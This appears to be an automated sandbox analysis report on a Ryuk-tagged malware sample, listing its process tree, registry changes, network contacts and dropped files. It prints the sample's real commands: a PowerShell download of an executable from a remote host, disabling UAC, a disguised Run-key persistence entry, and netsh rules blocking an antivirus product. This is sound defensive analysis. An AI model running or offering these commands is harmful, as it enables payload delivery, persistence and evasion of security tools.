Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" C:\Windows\System32\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\programdata\20250223024744\Agghosts.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\programdata\20250223024744\Agghosts.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\programdata\20250223024744\Agghosts.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\programdata\20250223024744\Agghosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2360 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024744\Agghosts.exe
PID 2360 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024744\Agghosts.exe
PID 2360 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024744\Agghosts.exe
PID 2360 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024744\Agghosts.exe
PID 2708 wrote to memory of 2508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2708 wrote to memory of 2508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2708 wrote to memory of 2508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2360 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2360 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2360 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2360 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2432 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2432 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2432 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2432 wrote to memory of 544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2432 wrote to memory of 544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2432 wrote to memory of 544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1440 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Downloads\20250223024744\1.bat" "

C:\programdata\20250223024744\Agghosts.exe

"C:\programdata\20250223024744\Agghosts.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Downloads\20250223024744\fhq.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile settings inboundusernotification disable

Network

Country Destination Domain Proto
US 8.8.8.8:53 baba-1336130708.cos.ap-tokyo.myqcloud.com udp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
N/A 127.0.0.1:49226 tcp
US 8.8.8.8:53 www.baidu.com udp
CN 103.235.47.188:80 www.baidu.com tcp
US 8.8.8.8:53 spoutry.it.com udp
JP 118.107.15.176:8081 spoutry.it.com tcp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.23.205.233:80 www.microsoft.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabE227.tmp

C:\Users\Admin\AppData\Local\Temp\TarE43C.tmp

C:\Users\Public\Downloads\20250223024744\1.bat

C:\ProgramData\20250223024744\Agghosts.exe

C:\ProgramData\lnk\2.lnk

C:\programdata\20250223024744\libcef.dll

C:\Users\Public\Videos\download_and_run.bat

C:\programdata\20250223024744\Ensup.log

C:\Users\Public\Downloads\20250223024744\fhq.bat

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
